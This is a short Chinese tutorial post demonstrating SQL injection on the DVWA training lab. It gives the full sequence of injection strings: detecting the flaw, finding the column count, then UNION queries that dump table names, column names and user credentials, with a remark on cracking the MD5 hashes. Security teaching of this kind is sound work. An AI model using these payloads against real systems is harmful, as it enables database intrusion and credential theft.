zoukankan      html  css  js  c++  java
  • 渗透测试---SQL注入~dvwa SQLi演示

    在dvwaSQL注入模块中

    判断出为字符型注入。

    id=1' and 1=1 -- 执行成功

    id=1' and 1=2 -- 执行失败

    使用order by判断列数为2。

    id=1' order by 2 -- 执行成功

    id=1' order by 3 -- 执行失败

    使用union select联合查询

    查表:

    id=1' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database() -- 

    id=1' and 1=2 union select (select group_concat(table_name)from information_schema.tables where table_schema=database()),2 -- 

    查字段:

    id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema='dvwa' and table_name='users' -- 

    id=1' and 1=2 union select (select group_concat(column_name)from information_schema.columns where table_schema='dvwa' and table_name='users'),2 -- 

    查内容:

    id=1' and 1=2 union select group_concat(user,password),2 from dvwa.users -- 

    id=1' and 1=2 union select (select group_concat(user,password)from dvwa.users),2 -- 

    查询出的密码使用md5进行了加密,可以使用网上的在线解码进行解码操作。

    md5加密的密码只能暴力破解。

  • 相关阅读:
    pat 09-排序1. 排序(25)
    pat 06-图2. Saving James Bond
    hdu 2818 Building Block
    并查集
    hdu 1213 How Many Tables
    hdu 1232 畅通工程
    hdu 1258 Sum It Up
    如何查看Navicat 查询结果
    Navicat查询功能怎么用
    如何设置Navicat 筛选向导
  • 原文地址:https://www.cnblogs.com/123456ZJJ/p/12789069.html
Copyright © 2011-2022 走看看